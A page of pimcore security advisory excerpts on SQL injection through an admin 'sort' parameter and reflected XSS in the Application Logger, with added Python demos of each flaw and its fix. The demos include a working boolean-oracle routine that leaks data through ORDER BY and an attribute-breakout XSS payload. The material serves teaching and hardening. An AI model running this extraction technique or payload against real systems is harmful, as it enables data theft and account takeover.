SQL injection in some Admin Sort functions
Description: SQL injection due to unsanitized string concatenation into the ORDER BY clause via the 'sort' parameter. Proof of Concept: Log in as an admin, go to the Admin Translations or Application Logger functions, and perform a sort action. Observe the request in Burp Suite; the injection point is the 'sort'...
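The pattern the advisory describes (a 'sort' value pasted into ORDER BY) cannot be fixed with bound parameters, because SQL drivers only bind values, not identifiers. The following is an added example, not pimcore's code: it builds a throwaway SQLite table with constructed rows, shows the vulnerable concatenation, uses it as a boolean oracle to read a value the sort endpoint never returns, and then shows the allow-list hardening. Table and column names (translations, id, name, text) are assumptions for the demo.

```python
import sqlite3

# Constructed sample rows standing in for an admin translations table.
ROWS = [
    (1, "welcome", "Welcome"),
    (2, "logout", "Log out"),
    (3, "secret", "s3cr3t-flag"),
]

# Hardened version only accepts these identifiers for ORDER BY.
ALLOWED_SORT_COLUMNS = {"id", "name", "text"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}


def make_db():
    """In-memory SQLite database seeded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE translations (id INTEGER, name TEXT, text TEXT)")
    conn.executemany("INSERT INTO translations VALUES (?, ?, ?)", ROWS)
    return conn


def list_vulnerable(conn, sort, direction="ASC"):
    """Vulnerable pattern: the untrusted 'sort' parameter is concatenated into ORDER BY."""
    sql = "SELECT id, name, text FROM translations ORDER BY " + sort + " " + direction
    return conn.execute(sql).fetchall()


def list_hardened(conn, sort, direction="ASC"):
    """Hardened pattern: ORDER BY identifiers are checked against an allow-list."""
    if sort not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"unsupported sort column: {sort!r}")
    direction = direction.upper()
    if direction not in ALLOWED_DIRECTIONS:
        raise ValueError(f"unsupported sort direction: {direction!r}")
    # Only allow-listed literals reach the query string, so this is safe to format.
    sql = f"SELECT id, name, text FROM translations ORDER BY {sort} {direction}"
    return conn.execute(sql).fetchall()


def oracle_probe(conn, guess):
    """Boolean oracle through ORDER BY: the row order flips depending on a subquery.

    If the condition holds the result is ordered by id ascending (first id is 1);
    otherwise by -id ascending (first id is 3). The attacker learns one bit per request.
    """
    sort = (
        "(CASE WHEN (SELECT text FROM translations WHERE id = 3) "
        f"LIKE '{guess}%' THEN id ELSE -id END)"
    )
    rows = list_vulnerable(conn, sort)
    return rows[0][0] == 1


def leak_secret(conn, alphabet="abcdefghijklmnopqrstuvwxyz0123456789-", max_len=16):
    """Recover a value character by character using only the sort order as feedback."""
    known = ""
    for _ in range(max_len):
        for ch in alphabet:
            if oracle_probe(conn, known + ch):
                known += ch
                break
        else:
            break  # no character extends the prefix: the value is complete
    return known


if __name__ == "__main__":
    db = make_db()
    print("leaked via ORDER BY oracle:", leak_secret(db))
    try:
        list_hardened(db, "(CASE WHEN 1=1 THEN id ELSE -id END)")
    except ValueError as exc:
        print("hardened endpoint rejected:", exc)
```

The oracle only needs the first row of a sorted listing, which is exactly what an admin grid returns, so a request with a crafted 'sort' leaks data from any table the application's database user can read. The hardened function is the standard fix: map the client's sort field onto a fixed set of column names and directions and reject anything else before touching SQL.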
GHSA-2XPM-CMVW-3JCC Reflected XSS in Application Logger module
Impact: This vulnerability could allow an attacker to steal a user's cookie and gain unauthorized access to that user's account, or to redirect users to malicious sites. Patches: Update to version 10.5.19 or apply this patch manually...
Cross-Site Scripting (XSS)
pimcore/pimcore is vulnerable to Cross-Site Scripting (XSS). The vulnerability exists in the getTabPanel function in admin.js and is reached through the From and To fields when searching in the Application Logger module, allowing an attacker to inject and execute arbitrary JavaScript...
Reflected XSS in Application Logger module
Description: pimcore is vulnerable to Reflected XSS in the From and To fields when searching in the Application Logger module. Payload " Proof of Concept: 1. Go to https://demo.pimcore.fun/admin/ and log in. 2. In the left menu bar, go to Tools - Application Logger. 3. In the Application Logger tab, on the...
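Both Application Logger entries above come down to the same defect: the From and To search values are written into markup without escaping, and the payload breaks out of the attribute it lands in. The following is an added example, not pimcore's admin.js: a vulnerable renderer beside an escaped one, plus a small HTML-parser audit that checks whether a search value changed the DOM rather than just grepping for a string. The markup shape and the payload are constructed for the demo; the advisory's own payload is not reproduced on this page.

```python
import html
from html.parser import HTMLParser

# Constructed attribute-breakout payload; the advisory's real payload is not shown here.
PAYLOAD = '"><img src=x onerror=alert(1)>'


def render_vulnerable(from_value, to_value):
    """Vulnerable pattern: untrusted search values interpolated straight into attributes."""
    return (
        f'<input name="from" value="{from_value}">'
        f'<input name="to" value="{to_value}">'
    )


def render_hardened(from_value, to_value):
    """Hardened pattern: escape for attribute context (quote=True also encodes " and ')."""
    return (
        f'<input name="from" value="{html.escape(from_value, quote=True)}">'
        f'<input name="to" value="{html.escape(to_value, quote=True)}">'
    )


class TagCollector(HTMLParser):
    """Records every start tag and every on* event-handler attribute it encounters."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def audit(markup):
    """Return (tags, handler_attrs) found in the markup, for a structural XSS check."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags, collector.handlers


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        tags, handlers = audit(render(PAYLOAD, "2023-01-01"))
        print(f"{label}: tags={tags} handlers={handlers}")
```

The structural check is the one to automate: the expected output has exactly two input elements and no event-handler attributes, so any extra element or on* attribute means a search value escaped its attribute. Escaping with quote=True closes the attribute-context breakout; escaping without it would stop a bare `<script>` but not a payload that opens with `"`.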